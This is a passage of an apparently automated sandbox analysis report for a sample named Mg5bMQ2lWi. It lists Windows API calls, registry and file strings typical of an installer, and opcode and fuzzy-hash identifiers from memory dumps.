                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                            • API String ID: 47109696-2199428270
                                                                                                            • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                                            • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                                                            • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                                            • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID: $pI$.tmp$oI
                                                                                                            • API String ID: 1375471231-740224434
                                                                                                            • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                                            • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                                                            • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                                            • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                                                            APIs
                                                                                                            • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                            • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                            • String ID: lAB
                                                                                                            • API String ID: 4191631535-3476862382
                                                                                                            • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                                            • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                                                            • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                                            • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                                                            APIs
                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                            • API String ID: 588496660-1846899949
                                                                                                            • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                                            • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                                            • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                                            • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                                            • String ID: $Need to restart Windows? %s
                                                                                                            • API String ID: 1160245247-4200181552
                                                                                                            • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                                            • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                                                            • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                                            • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                            • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                            • String ID: Creating directory: %s
                                                                                                            • API String ID: 2451617938-483064649
                                                                                                            • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                                            • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                                                            • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                                            • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                                            • API String ID: 2508298434-591603554
                                                                                                            • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                                            • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                                                            • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                                            • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                                                            APIs
                                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                            • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                                            • String ID: @
                                                                                                            • API String ID: 3749476976-2766056989
                                                                                                            • Opcode ID: 877b472e956cf60183337d46f988a388bb6c78a10cf8e4cbe7dc1b050eece8f4
                                                                                                            • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                                                            • Opcode Fuzzy Hash: 877b472e956cf60183337d46f988a388bb6c78a10cf8e4cbe7dc1b050eece8f4
                                                                                                            • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                                                            APIs
                                                                                                            • 74D41520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                                                            • 74D41500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                                                            • 74D41540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: D41500D41520D41540
                                                                                                            • String ID: j]I
                                                                                                            • API String ID: 2153611984-3121892809
                                                                                                            • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                                            • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                                                            • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                                            • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastProcess
                                                                                                            • String ID: XtE$ptE
                                                                                                            • API String ID: 2919029540-3149052308
                                                                                                            • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                                            • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                                                            • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                                            • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                                                            APIs
                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                                            • API String ID: 395431579-1506664499
                                                                                                            • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                                            • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                                            • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                                            • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                                                            Strings
                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                                                            • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                                                            • PendingFileRenameOperations, xrefs: 00454F5C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                            • API String ID: 47109696-2115312317
                                                                                                            • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                                            • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                                                            • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                                            • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                                                            • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                                                            • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2066263336-0
                                                                                                            • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                                            • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                                                            • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                                            • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                                                            • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2066263336-0
                                                                                                            • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                                            • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                                                            • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                                            • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                                                            APIs
                                                                                                            • GetMenu.USER32(00000000), ref: 00421371
                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu
                                                                                                            • String ID:
                                                                                                            • API String ID: 3711407533-0
                                                                                                            • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                                            • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                                            • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                                            • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BC8
